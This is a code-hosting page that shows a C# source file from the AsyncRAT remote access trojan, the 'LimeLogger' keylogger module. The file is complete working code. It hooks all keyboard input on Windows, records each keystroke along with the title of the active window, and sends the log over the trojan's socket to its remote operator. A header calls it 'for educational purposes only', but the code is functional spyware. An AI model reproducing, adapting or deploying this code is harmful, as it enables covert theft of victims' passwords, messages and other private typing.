Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
AsyncRAT-C-Sharp/AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs
NYAN CAT 3d6fc39c2c Update keylogger
2019-06-15 18:57:26 +03:00

222 lines
8.6 KiB
C#
Raw Blame History

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;
using Client.MessagePack;
using System.Threading;
using Client.Sockets;
namespace Client.Handle_Packet
{
// │ Author : NYAN CAT
// │ Name : LimeLogger v0.1
// │ Contact : https://github.com/NYAN-x-CAT
// This program is distributed for educational purposes only.
public static class HandleLimeLogger
{
public static bool isON = false;
public static void Run()
{
_hookID = SetHook(_proc);
new Thread(() =>
{
while (ClientSocket.IsConnected)
{
Thread.Sleep(10);
if (isON == false)
{
break;
}
}
UnhookWindowsHookEx(_hookID);
CurrentActiveWindowTitle = "";
Application.Exit();
}).Start();
Application.Run();
}
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WHKEYBOARDLL, proc,
GetModuleHandle(curModule.ModuleName), 0);
}
}
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
try
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
bool capsLock = (GetKeyState(0x14) & 0xffff) != 0;
bool shiftPress = (GetKeyState(0xA0) & 0x8000) != 0 || (GetKeyState(0xA1) & 0x8000) != 0;
string currentKey = KeyboardLayout((uint)vkCode);
if (capsLock || shiftPress)
{
currentKey = KeyboardLayout((uint)vkCode).ToUpper();
}
else
{
currentKey = KeyboardLayout((uint)vkCode).ToLower();
}
if ((Keys)vkCode >= Keys.F1 && (Keys)vkCode <= Keys.F24)
currentKey = "[" + (Keys)vkCode + "]";
else
{
switch (((Keys)vkCode).ToString())
{
case "Space":
currentKey = " ";
break;
case "Return":
currentKey = "[ENTER]\n";
break;
case "Escape":
//currentKey = "[ESC]\n";
currentKey = "";
break;
case "LControlKey":
//currentKey = "[CTRL]";
currentKey = "";
break;
case "RControlKey":
//currentKey = "[CTRL]";
currentKey = "";
break;
case "RShiftKey":
//currentKey = "[Shift]";
currentKey = "";
break;
case "LShiftKey":
//currentKey = "[Shift]";
currentKey = "";
break;
case "Back":
currentKey = "[Back]";
break;
case "LWin":
//currentKey = "[WIN]";
currentKey = "";
break;
case "Tab":
currentKey = "[Tab]\n";
break;
}
}
StringBuilder sb = new StringBuilder();
if (CurrentActiveWindowTitle == GetActiveWindowTitle())
{
sb.Append(currentKey);
}
else
{
sb.Append(Environment.NewLine);
sb.Append(Environment.NewLine);
sb.Append($"### {GetActiveWindowTitle()} ###");
sb.Append(Environment.NewLine);
sb.Append(currentKey);
}
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
msgpack.ForcePathObject("log").AsString = sb.ToString();
ClientSocket.Send(msgpack.Encode2Bytes());
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
catch
{
return IntPtr.Zero;
}
}
private static string KeyboardLayout(uint vkCode)
{
try
{
StringBuilder sb = new StringBuilder();
byte[] vkBuffer = new byte[256];
if (!GetKeyboardState(vkBuffer)) return "";
uint scanCode = MapVirtualKey(vkCode, 0);
IntPtr keyboardLayout = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), out uint processId));
ToUnicodeEx(vkCode, scanCode, vkBuffer, sb, 5, 0, keyboardLayout);
return sb.ToString();
}
catch { }
return ((Keys)vkCode).ToString();
}
private static string GetActiveWindowTitle()
{
try
{
IntPtr hwnd = GetForegroundWindow();
GetWindowThreadProcessId(hwnd, out uint pid);
Process p = Process.GetProcessById((int)pid);
string title = p.MainWindowTitle;
if (string.IsNullOrWhiteSpace(title))
title = p.ProcessName;
CurrentActiveWindowTitle = title;
return title;
}
catch (Exception)
{
return "???";
}
}
#region "Hooks & Native Methods"
private const int WM_KEYDOWN = 0x0100;
private static readonly LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
private static readonly int WHKEYBOARDLL = 13;
private static string CurrentActiveWindowTitle;
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("user32.dll")]
static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll", SetLastError = true)]
static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
[DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true, CallingConvention = CallingConvention.Winapi)]
public static extern short GetKeyState(int keyCode);
[DllImport("user32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool GetKeyboardState(byte[] lpKeyState);
[DllImport("user32.dll")]
static extern IntPtr GetKeyboardLayout(uint idThread);
[DllImport("user32.dll")]
static extern int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpKeyState, [Out, MarshalAs(UnmanagedType.LPWStr)] StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl);
[DllImport("user32.dll")]
static extern uint MapVirtualKey(uint uCode, uint uMapType);
#endregion
}
}
Reference in New Issue View Git Blame Copy Permalink